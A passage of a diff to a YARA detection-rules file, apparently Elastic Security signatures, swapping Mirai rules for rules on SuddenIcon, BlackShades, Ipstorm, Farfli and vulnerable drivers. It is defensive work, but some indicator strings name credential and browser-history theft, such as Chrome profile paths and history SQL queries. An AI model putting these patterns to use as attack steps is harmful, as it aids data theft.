"b6b6991e016419b1ddf22822ce76401370471f852866f0da25c7b0f4bec530ee" - threat_name = "Linux.Trojan.Mirai" + fingerprint = "456b69d4035aa2d682ba081c2f7b24c696f655ec164645f83c9aef5bd262f510" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79689,83 +80185,88 @@ rule ELASTIC_Linux_Trojan_Mirai_1C0D246D : FILE MEMORY os = "linux" strings: - $a = { E7 C0 00 51 78 0F 1B FF 8A 7C 18 27 83 2F 85 2E CB 14 50 2E } + $a = { 72 72 6F 72 3A 20 47 65 74 25 73 20 74 65 6D 70 20 72 65 74 75 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Ad337D2F : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Cpuz_A53D1446 : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Name: cpuz.sys, Version: 1.0.4.3" author = "Elastic Security" - id = "ad337d2f-d4ac-42a7-9d2e-576fe633fa16" - date = "2021-06-28" - modified = "2021-09-16" - reference = "012b717909a8b251ec1e0c284b3c795865a32a1f4b79706d2254a4eb289c30a7" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1702-L1720" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "dba630c1deb00b0dbd9f895a9b93393bc634150c8f32527b02d8dd71dc806e7d" + id = "a53d1446-ebf7-44f3-843c-2ea5f043e168" + date = "2022-04-07" + modified = "2022-04-07" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Cpuz.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6" + logic_hash = "37da20f5fe1377fe85594055dc811424f52e53a9d77060c6784c2e4d1279e26f" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "67cbcb8288fe319c3b8f961210748f7cea49c2f64fc2f1f55614d7ed97a86238" - severity = 100 + tags = "FILE" + fingerprint = "1b74df56b73fa8d178a968427480332c6935e023af295e4fff5810bb66db6aab" + threat_name = "Windows.VulnDriver.Cpuz" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 01 75 14 80 78 FF 2F 48 8D 40 FF 0F 94 C2 48 39 D8 77 EB 84 D2 } + $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 63 00 70 00 75 00 7A 00 2E 00 73 00 79 00 73 00 00 00 } + $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\x03][\x00-\x00])([\x00-\x04][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x00][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x00][\x00-\x00])([\x00-\x01][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\x03][\x00-\x00]))/ condition: - all of them + int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version } -rule ELASTIC_Linux_Trojan_Mirai_88A1B067 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Farfli_85D1Bcc9 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Farfli (Windows.Trojan.Farfli)" author = "Elastic Security" - id = "88a1b067-11d5-4128-b763-2d1747c95eef" - date = "2021-06-28" - modified = "2021-09-16" - reference = "1a62db02343edda916cbbf463d8e07ec2ad4509fd0f15a5f6946d0ec6c332dd9" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1722-L1740" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "0755f1f974734ccd4ecc444217bf52ed306d1dc32c05841ba9ca6d259e1a147e" + id = "85d1bcc9-c3c7-454c-a77f-0e0de933c4c3" + date = "2022-02-17" + modified = "2022-04-12" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Farfli.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e3e9ea1b547cc235e6f1a78b4ca620c69a54209f84c7de9af17eb5b02e9b58c3" + logic_hash = "746eb5a2583077189d82d1a96b499ff383f31220845bd8a6df5b7a7ceb11e6fb" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b32b42975297aed7cef72668ee272a5cfb753dce7813583f0c3ec91e52f8601f" + fingerprint = "56a5e4955556d08b80849ea5775f35f5a32999d6b5df92357ab142a4faa74ac3" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 55 89 E5 0F B6 55 08 0F B6 45 0C C1 E2 18 C1 E0 10 } + $a = { AB 66 AB C6 45 D4 25 C6 45 D5 73 C6 45 D6 5C C6 45 D7 25 C6 45 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_76Bbc4Ca : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ipstorm_3C43D4A7 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" author = "Elastic Security" - id = "76bbc4ca-e6da-40f7-8ba6-139ec8393f35" - date = "2021-06-28" + id = "3c43d4a7-185a-468b-a73d-82f579de98c1" + date = "2021-01-12" modified = "2021-09-16" - reference = "1a9ff86a66d417678c387102932a71fd879972173901c04f3462de0e519c3b51" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1742-L1760" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "855b7938b92b5645fcefd2ec1e2ccb71269654816f362282ccbf9aef1c01c8a0" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ipstorm.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5103133574615fb49f6a94607540644689be017740d17005bc08b26be9485aa7" + logic_hash = "c7e9191312197f8925d7231d0b8badf8b5ca35685df909c0d1feb301b4385d7b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "4206c56b538eb1dd97e8ba58c5bab6e21ad22a0f8c11a72f82493c619d22d9b7" + fingerprint = "cf6812f8f0ee7951a70bec3839b798a574d536baae4cf37cda6eebf570cab0be" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79773,28 +80274,28 @@ rule ELASTIC_Linux_Trojan_Mirai_76Bbc4Ca : FILE MEMORY os = "linux" strings: - $a = { 10 40 2D E9 00 40 A0 E1 28 20 84 E2 0C 00 92 E8 3B F1 FF EB } + $a = { 48 8D 54 24 58 31 F6 EB 11 48 8B 84 24 88 00 00 00 48 89 F1 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_0Bfc17Bd : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ipstorm_F9269F00 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" author = "Elastic Security" - id = "0bfc17bd-49bb-4721-9653-0920b631b1de" - date = "2022-01-05" - modified = "2022-01-26" + id = "f9269f00-4664-47a4-9148-fa74e2cfee7c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1762-L1780" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1cdd94f2a1cb2b93134646c171d947e325a498f7a13db021e88c05a4cbb68903" - logic_hash = "ef83bc9ae3c881d09b691db42a1712b500a5bb8df34060a6786cfdc6caaf5530" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ipstorm.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5103133574615fb49f6a94607540644689be017740d17005bc08b26be9485aa7" + logic_hash = "5914d222b49aaf6c1040e48ffd93c04bd5df25f1d97bde79b034862fca6555f6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "d67e4e12e74cbd31037fae52cf7bad8d8d5b4240d79449fa1ebf9a271af008e1" + fingerprint = "509de41454bcc60dad0d96448592aa20fb997ce46ad8fed5d4bbdbe2ede588d6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79802,28 +80303,28 @@ rule ELASTIC_Linux_Trojan_Mirai_0Bfc17Bd : FILE MEMORY os = "linux" strings: - $a = { 54 24 64 0F CD 48 8D 14 52 41 0F B6 4C D7 14 D3 E8 01 C5 83 7C 24 } + $a = { EC C0 00 00 00 48 89 AC 24 B8 00 00 00 48 8D AC 24 B8 00 00 00 B8 69 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_389Ee3E9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ipstorm_08Bcf61C : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Ipstorm (Linux.Trojan.Ipstorm)" author = "Elastic Security" - id = "389ee3e9-70c1-4c93-a999-292cf6ff1652" - date = "2022-01-05" - modified = "2022-01-26" + id = "08bcf61c-baef-4320-885c-8f8949684dde" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1782-L1800" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" - logic_hash = "fedeae98d468a11c3eaa561b9d5433ec206bdd4caed5aed7926434730f7f866b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ipstorm.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "503f293d84de4f2c826f81a68180ad869e0d1448ea6c0dbf09a7b23801e1a9b9" + logic_hash = "fb2755c04b61d19788a92b8c9c1c9eb2552b62b27011e302840fdcf689b3d9b4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e" + fingerprint = "348295602b1582839f6acc603832f09e9afab71731bc21742d1a638e41df6e7c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -79831,173 +80332,194 @@ rule ELASTIC_Linux_Trojan_Mirai_389Ee3E9 : FILE MEMORY os = "linux" strings: - $a = { 89 45 00 EB 2C 8B 4B 04 8B 13 8B 7B 18 8B 01 01 02 8B 02 83 } + $a = { 8C 24 98 00 00 00 31 D2 31 DB EB 04 48 83 C1 18 48 8B 31 48 83 79 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_Cc93863B : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blackshades_9D095C44 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Blackshades (Windows.Trojan.BlackShades)" author = "Elastic Security" - id = "cc93863b-1050-40ba-9d02-5ec9ce6a3a28" - date = "2022-01-05" - modified = "2022-01-26" + id = "9d095c44-5047-453e-8435-f30de94565e6" + date = "2022-02-28" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1802-L1820" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" - logic_hash = "881998dee010270d7cefae5b59a888e541d4a2b93e3e52ae0abe0df41371c50d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BlackShades.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e58e352edaa8ae7f95ab840c53fcaf7f14eb640df9223475304788533713c722" + logic_hash = "2a2e6325d3de9289cc8bc26e1fe89a8fa81d9aae50b92ba2cf21c4cc6556ac9e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac" + fingerprint = "be7d4c8200c293c3c8046d9f87b0d127ff051679ae1caeab12c533ea4309a1fc" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C3 57 8B 44 24 0C 8B 4C 24 10 8B 7C 24 08 F3 AA 8B 44 24 08 } + $a1 = "*\\AD:\\Blackshades Project\\bs_net\\server\\server.vbp" wide fullword + $a2 = "@*\\AD:\\Blackshades Project\\bs_net\\server\\server.vbp" wide fullword + $a3 = "D:\\Blackshades Project\\bs_net\\loginserver\\msvbvm60.dll\\3" ascii fullword + $b1 = "modSniff" ascii fullword + $b2 = "UDPFlood" ascii fullword + $b3 = "\\nir_cmd.bss speak text " wide fullword + $b4 = "\\pws_chro.bss" wide fullword + $b5 = "tmrLiveLogger" ascii fullword condition: - all of them + 1 of ($a*) or all of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_8Aa7B5D3 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Blackshades_Be382Dac : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Blackshades (Windows.Trojan.BlackShades)" author = "Elastic Security" - id = "8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9" - date = "2022-01-05" - modified = "2022-01-26" + id = "be382dac-6a6f-43e4-86bb-c62f0db9b43a" + date = "2022-02-28" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1822-L1840" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f" - logic_hash = "3c99b7b126184b75802c7198c81f4783af776920edc6e964dbe726d28d88f64d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_BlackShades.yar#L28-L46" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e58e352edaa8ae7f95ab840c53fcaf7f14eb640df9223475304788533713c722" + logic_hash = "a13e37e7930d2d1ed1aa4fdeb282f11bfeb7fe008625589e2bfeab0beea43580" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444" + fingerprint = "e7031c42e51758358db32d8eba95f43be7dd5c4b57e6f9a76f0c3b925eae4e43" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 8B 4C 24 14 8B 74 24 0C 8B 5C 24 10 85 C9 74 0D 31 D2 8A 04 1A 88 } + $a1 = { 09 0E 4C 09 10 54 09 0E 4C 09 10 54 09 0E 4C 09 10 54 09 10 54 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_76908C99 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Suddenicon_99487621 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Suddenicon (Windows.Trojan.SuddenIcon)" author = "Elastic Security" - id = "76908c99-e350-4dbb-9559-27cbe05f55f9" - date = "2022-09-12" - modified = "2022-10-18" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1842-L1860" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "533a90959bfb337fd7532fb844501fd568f5f4a49998d5d479daf5dfbd01abb2" - logic_hash = "bd8254e888b1ea93ca9aad92ea2c8ece1f2d03ae2949ca4c3743b6e339ee21e0" + id = "99487621-88c4-40f6-918a-f1276cc2d2a7" + date = "2023-03-29" + modified = "2023-03-30" + reference = "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SuddenIcon.yar#L1-L26" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973" + logic_hash = "9a441c47e8b95d8aaec6f495d6ddfec2ed6b0762637ea48e64c9ea01b0945019" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1741b0c2121e3f73bf7e4f505c4661c95753cbf7e0b7a1106dc4ea4d4dd73d6c" + fingerprint = "b16f7de530ed27c42bffec4bcfc1232bad34cdaf4e7a9803fce0564e12701ef1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 64 24 F8 48 89 04 24 48 8B C6 48 8B 34 24 48 87 CF 48 8B 4C } + $str1 = "https://raw.githubusercontent.com/IconStorages/images/main/icon%d.ico" wide fullword + $str2 = "__tutma" ascii fullword + $str3 = "__tutmc" ascii fullword + $str4 = "%s: %s" ascii fullword + $str5 = "%s=%s" ascii fullword + $seq_obf = { C1 E1 ?? 33 C1 45 8B CA 8B C8 C1 E9 ?? 33 C1 81 C2 ?? ?? ?? ?? 8B C8 C1 E1 ?? 33 C1 41 8B C8 } + $seq_virtualprotect = { FF 15 ?? ?? ?? ?? 85 C0 74 ?? FF D5 48 85 C0 74 ?? 81 7B ?? CA 7D 0F 00 75 ?? 48 8D 54 24 ?? 48 8D 4C 24 ?? FF D0 8B F8 44 8B 44 24 ?? 4C 8D 4C 24 ?? BA 00 10 00 00 48 8B CD FF 15 ?? ?? ?? ?? } condition: - all of them + 5 of ($str*) or 2 of ($seq*) } -rule ELASTIC_Linux_Trojan_Mirai_1538Ce1A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Suddenicon_8B07C275 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Suddenicon (Windows.Trojan.SuddenIcon)" author = "Elastic Security" - id = "1538ce1a-7078-4be3-bd69-7e692a1237f5" - date = "2022-09-12" - modified = "2022-10-18" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1862-L1880" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" - logic_hash = "cf2dd11da520640c6a64e05c4679072a714d8cf93d5f5aa3a1eca8eb3e9c8b3b" + id = "8b07c275-f389-4e55-bcec-4b1344cad33d" + date = "2023-03-29" + modified = "2023-03-30" + reference = "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SuddenIcon.yar#L28-L48" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "aa4e398b3bd8645016d8090ffc77d15f926a8e69258642191deb4e68688ff973" + logic_hash = "64e8bd8929c9fb8cae16f772e3266b02b4ddec770ff8d5379a93a483eb8ff660" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "f3d82cae74db83b7a49c5ec04d1a95c3b17ab1b935de24ca5c34e9b99db36803" + fingerprint = "482f1e668ab63be44a249274e0eaa167e1418c42a8f0e9e85b26e4e23ff57a0d" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FD 00 00 00 FD 34 FD FD 04 40 FD 04 FD FD 7E 14 FD 78 14 1F 0F } + $str1 = { 33 C9 E8 ?? ?? ?? ?? 48 8B D8 E8 ?? ?? ?? ?? 44 8B C0 B8 ?? ?? ?? ?? 41 F7 E8 8D 83 ?? ?? ?? ?? C1 FA ?? 8B CA C1 E9 ?? 03 D1 69 CA ?? ?? ?? ?? 48 8D 55 ?? 44 2B C1 48 8D 4C 24 ?? 41 03 C0 } + $str2 = { B8 ?? ?? ?? ?? 41 BA ?? ?? ?? ?? 0F 11 84 24 ?? ?? ?? ?? 44 8B 06 8B DD BF ?? ?? ?? ?? } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_07B1F4F6 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Suddenicon_Ac021Ae0 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Trojan Suddenicon (Windows.Trojan.SuddenIcon)" author = "Elastic Security" - id = "07b1f4f6-9324-48ab-9086-b738fdaf47c3" - date = "2022-09-12" - modified = "2022-10-18" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1882-L1900" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" - logic_hash = "4af1a20e29e0c9b62e1530031e49a3d7b37d4e9a547d89a270a2e59e0c7852cc" + id = "ac021ae0-67c6-45cf-a467-eb3c2b84b3e4" + date = "2023-03-30" + modified = "2023-03-30" + reference = "https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SuddenIcon.yar#L50-L76" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "033eabdd8ce8ecc4e1a657161c1f298c7dfe536ee2dbf9375cfda894638a7bee" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bebafc3c8e68b36c04dc9af630b81f9d56939818d448759fdd83067e4c97e87a" + fingerprint = "115d4fc78bae7b5189a94b82ffd6547dfe89cfb66bf59d0e1d77c10fb937d2f7" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { FD 08 FD 5C 24 48 66 FD 07 66 FD 44 24 2E 66 FD FD 08 66 FD 47 } + $str1 = "%s\\%s\\%s\\%s" wide fullword + $str2 = "%s.old" wide fullword + $str3 = "\n******************************** %s ******************************\n\n" wide fullword + $str4 = "HostName: %s\\r\\nDomainName: %s\\r\\nOsVersion: %d.%d.%d\\r\\n\\r\\n" wide fullword + $str5 = "%s\\r\\nDomainName: %s\\r\\nOsVersion: %d.%d.%d\\r\\n\\r\\n" wide fullword + $str6 = "AppData\\Local\\Google\\Chrome\\User Data" wide fullword + $str7 = "SELECT url, title FROM urls ORDER BY id DESC LIMIT 500" wide fullword + $str8 = "SELECT url, title FROM moz_places ORDER BY id DESC LIMIT 500" wide fullword + $b1 = "\\3CXDesktopApp\\config.json" wide fullword condition: - all of them + 6 of ($str*) or 1 of ($b*) } -rule ELASTIC_Linux_Trojan_Mirai_Feaa98Ff : FILE MEMORY +rule ELASTIC_Linux_Trojan_Xpmmap_7Dcc3534 : FILE MEMORY { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Linux Trojan Xpmmap (Linux.Trojan.Xpmmap)" author = "Elastic Security" - id = "feaa98ff-6cd9-40bb-8c4f-ea7c79b272f3" - date = "2022-09-12" - modified = "2022-10-18" + id = "7dcc3534-e94c-4c92-ac9b-a82b00fb045b" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1902-L1920" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2382996a8fd44111376253da227120649a1a94b5c61739e87a4e8acc1130e662" - logic_hash = "06be9d8bcfcb7e6b600103cf29fa8a94a457ff56e8c7018336c270978a57ccbf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Xpmmap.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "765546a981921187a4a2bed9904fbc2ccb2a5876e0d45c72e79f04a517c1bda3" + logic_hash = "f88cc0f02797651e8cdf8e25b67a92f7825ec616b79df21daae798b613baf334" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0bc8ba390a11e205624bc8035b1d1e22337a5179a81d354178fa2546c61cdeb0" + fingerprint = "397618543390fb8fd8b198f63034fe88b640408d75b769fb337433138dafcf66" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -80005,57 +80527,57 @@ rule ELASTIC_Linux_Trojan_Mirai_Feaa98Ff : FILE MEMORY os = "linux" strings: - $a = { 0F FD FD FD FD FD FD 7A 03 41 74 5E 42 31 FD FD 6E FD FD FD FD } + $a = { 48 89 45 F8 48 83 7D F8 FF 75 14 BF 10 0C 40 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Mirai_3Acd6Ed4 : FILE MEMORY +rule ELASTIC_Windows_Vulndriver_Fidpci_Cb7F69B5 : FILE { meta: - description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + description = "Detects Windows Vulndriver Fidpci (Windows.VulnDriver.Fidpci)" author = "Elastic Security" - id = "3acd6ed4-6d62-47af-8d80-d5465abce38a" - date = "2022-09-12" - modified = "2022-10-18" + id = "cb7f69b5-5421-493b-adf7-75130d19b001" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Mirai.yar#L1922-L1940" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2644447de8befa1b4fe39b2117d49754718a2f230d6d5f977166386aa88e7b84" - logic_hash = "ab284d41af8e1920fa54ac8bfab84bac493adf816aebce60490ab22c0e502201" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_VulnDriver_Fidpci.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = 